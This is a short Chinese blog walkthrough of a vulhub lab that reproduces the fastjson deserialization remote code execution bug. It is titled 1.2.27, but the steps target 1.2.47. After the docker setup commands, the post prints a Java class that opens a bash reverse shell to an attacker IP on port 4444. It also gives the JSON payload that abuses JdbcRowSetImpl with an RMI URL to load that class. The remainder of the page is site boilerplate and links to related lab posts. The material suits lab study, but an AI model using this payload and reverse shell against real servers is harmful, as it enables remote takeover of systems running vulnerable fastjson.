vulhub之fastjson篇-1.2.27-rce

已于 2024-04-08 16:33:19 修改
阅读量334 收藏 1
点赞数 6
文章标签: 网络安全 网络 linux 安全 经验分享
于 2024-04-08 16:29:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56306210/article/details/137514231
版权

一、启动环境

虚拟机:kali靶机:192.168.125.130/172.19.0.1(docker地址:172.19.0.2)

虚拟机:kali攻击机:192.168.125.130/172.19.0.1

本地MAC:172.XX.XX.XX

启动 fastjson 反序列化导致任意命令执行漏洞 环境

1.进入 vulhub 的 Fastjson 1.2.47 路径

cd /../../vulhub/fastjson/1.2.47-rce

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

二、漏洞利用

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c","bash -i >& /dev/tcp/192.168.125.130/4444 0>&1 &"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

将java文件编译成class文件

开启http服务

开启rmi服务

发送poc

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.125.130:9998/TouchFile",
        "autoCommit":true
    }
}

反弹成功

咩了个咩咩
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3536
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
Fastjson 1.2.24反序列化漏洞(Vulhub)使用方法
R0ot
03-12 875
Fastjson是阿里巴巴的一个开源JSON处理库,它可以实现Java对象与JSON之间的转换。然而,在Fastjson 1.2.24版本中,存在一个反序列化漏洞,攻击者可以通过构造恶意的JSON数据来触发该漏洞,进而执行任意代码,获取服务器敏感信息,甚至控制整个服务器。Vulhub是一个漏洞集成环境,方便安全研究人员进行漏洞复现和研究。本文将介绍如何使用Vulhub来搭建Fastjson 1.2.24反序列化漏洞环境,并演示漏洞的使用方法。
vulnhub DC9——实战通关详细思路
m0_61506558的博客
11-06 984
(一)环境搭建(一)环境搭建在官网上下载.ova,直接打开就可以了。(二)主机发现。查看用户文件 ls -a查看root权限sudo -l查看历史命令 history 查看内核漏洞 uname -a
prime1--vulnhub靶场通关教程
最新发布
m0_74402888的博客
04-29 2007
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 748
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
fastjson-1.2.54-API文档-中文版.zip
07-09
赠送jar包:fastjson-1.2.54.jar; 赠送原API文档:fastjson-1.2.54-javadoc.jar; 赠送源代码:fastjson-1.2.54-sources.jar; 赠送Maven依赖信息文件:fastjson-1.2.54.pom; 包含翻译后的API文档:fastjson-...
fastjson-1.2.76.jar
06-29
fastjson-1.2.76.jar
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的库,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
fastjson-1.2.70.jar.zip
03-21
《深入解析Fastjson-1.2.70.jar:Java高效JSON处理库》 Fastjson是阿里巴巴开源的一款高性能的JSON库,它为Java开发者提供了一种快速、灵活且功能强大的解决方案,用于处理JSON数据。Fastjson-1.2.70.jar是其在1.2....
最新版fastjson-2.0.4.jar
06-22
最新版fastjson-2.0.4.jar,阿里巴巴旗下现最流行的json转换工具包。详细操作使用,请参考我的文章链接:https://blog.csdn.net/qq_45978154/article/details/125004445?spm=1001.2014.3001.5502
fastjson-1.2.62.jar
11-22
fastjson-1.2.62.jar
fastjson-1.2.66_fastjson-1.2.66.jar_Fastjson_
09-30
《深入解析Fastjson 1.2.66版本》 Fastjson是阿里巴巴开源的一个高性能的JSON库,它在Java世界中被广泛使用,为开发者提供了快速、方便地处理JSON数据的能力。Fastjson 1.2.66是该库的一个稳定版本,其核心功能包括...
FastJsonJar-1.2.2.zip
04-26
fastjson-1.2.2.jar添加到项目的类路径中,如果是Maven项目,可以在pom.xml文件中添加如下依赖: ```xml <groupId>com.alibaba</groupId> <artifactId>fastjson <version>1.2.2 ``` 2.2 基本用法 - 将JSON...
fastjson-1.2.9.jar.zip
12-23
在标题中提到的 "fastjson-1.2.9.jar.zip" 是 Fastjson 的一个特定版本,包含的 "fastjson-1.2.9.jar" 文件是该库的可执行 JAR 包,开发者可以直接引入到项目中使用。 **JSON 解析与序列化** 1. **解析 JSON**: ...
fastjson2-2.0.39.zip
08-29
在Java世界里,阿里巴巴开源的Fastjson库因其高效、便捷的特性,成为了开发者处理JSON的首选工具之一。本文将深入探讨Fastjson2-2.0.39版本,解析其核心功能与使用技巧。 Fastjson是阿里巴巴的一个高性能的JSON库,...
vulhubfastjson-1.2.24-rce
weixin_56306210的博客
04-08 519
vulhubfastjson-1.2.24-rce
docker搭建vulhub靶场
weixin_55554070的博客
08-27 1019
近期自己想本地搭建一个靶场去多多练习漏洞理解漏洞原理,就在找资料docker搭建vulhub靶场。前面走过很多弯路,想在kali上搭建,但一直都搭建不起,就放弃了。kali出现的问题是公钥连接不上服务器(也有可能是自己kali版本的问题2019年的,太懒就没有重新安装),看了很多文章也没解决,就换成了centos7了,参考文章按照步骤来安装成功。 参考链接:https://www.jianshu.com/p/8264936cac30 步骤一:确定centos7能上网 步骤二:安装docker需要先
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2229
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
fastjson-2.0.35.jar和fastjson2-2.0.35.jar有冲突吗
07-11
`fastjson-2.0.35.jar` 和 `fastjson2-2.0.35.jar` 这两个 JAR 文件的命名看起来非常相似,但是它们可能是不同的版本或者来自不同的库。 一般情况下,如果两个 JAR 文件具有相同的类路径和类名,它们可能会产生冲突...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值